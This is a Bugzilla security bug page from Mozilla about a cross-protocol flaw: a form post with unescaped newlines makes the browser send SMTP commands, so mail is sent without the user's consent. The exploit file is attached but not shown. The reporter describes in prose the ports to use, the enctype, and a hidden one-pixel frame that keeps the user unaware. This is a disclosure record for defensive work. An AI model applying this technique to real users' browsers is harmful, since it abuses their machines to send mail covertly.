Closed
Bug 72149
Opened 23 years ago
Closed 23 years ago
Sending mail w/o user's consent using form post
Categories
(Core :: Security, defect)
Tracking
()
People
(Reporter: security-bugs, Assigned: gagan)
Details
Attachments
(1 file)
2.04 KB,
text/html
|
Details |
Well, I started to think what sort of bugs we could get using techniques similar to bug 71916 (the gopher security bug). And I came up with the attached. See the notes at the top. If you don't have sendmail 8.11 installed on your target host then you'll have to use port 25 instead of 587. ns4 doesn't work with port 25, so this exploit won't work under ns4 on that port. You have to have the enctype set on the form so that the newlines aren't escaped. I don't want to put this in bugzilla for obvious reasons. Blocking all ports < 1024 apart from the defaults is not a solution - I've seen webservers on 81 occasionally. This can be used to exploit any protocol which will ignore invalid lines. I mentioned this to jag, and he suggested a frame with height=1 so that the user never knows about it. Bradley
Reporter | ||
Comment 1•23 years ago
|
||
Reporter | ||
Updated•23 years ago
|
Status: NEW → ASSIGNED
OS: Windows NT → Linux
Reporter | ||
Comment 2•23 years ago
|
||
This was contributed by bbaetz@cs.mcgill.ca, but he wanted it kept confidential for the time being, which is why I'm filing it.
Status: ASSIGNED → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Comment 3•23 years ago
|
||
Okay, I'm using the exmaple, but I'm not sure a) the example is supposed to do anything or b) the fix that is in blocks the unwanted behaviour. Mitch?
Reporter | ||
Comment 4•23 years ago
|
||
Whoops, this isn't fixed. I'm not sure why this was marked fixed. No wonder I couldn't find it... dougt filed a bugscape bug on this, but I'll close that one out in favor of this one, since it belongs in bugzilla. Reopening and reassigning to gagan, since this is a Necko issue.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Reporter | ||
Updated•23 years ago
|
Assignee: mstoltz → gagan
Status: REOPENED → NEW
Reporter | ||
Comment 5•23 years ago
|
||
->gagan
Comment 6•23 years ago
|
||
The exploit needs a bit of modifying to work (you have to change the mailserver from localhost to judge.mcom.com, and set a valid name for the mail receiver). The bugscape bug is bug 5574. I wanted it confidential because it was exploitable :)
Comment 7•23 years ago
|
||
this is a dup of the more active bug *** This bug has been marked as a duplicate of 83401 ***
Status: NEW → RESOLVED
Closed: 23 years ago → 23 years ago
Resolution: --- → DUPLICATE
Comment 9•23 years ago
|
||
-nsconf (after discussion with mitch) so that this can be mentioned in a relnote
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•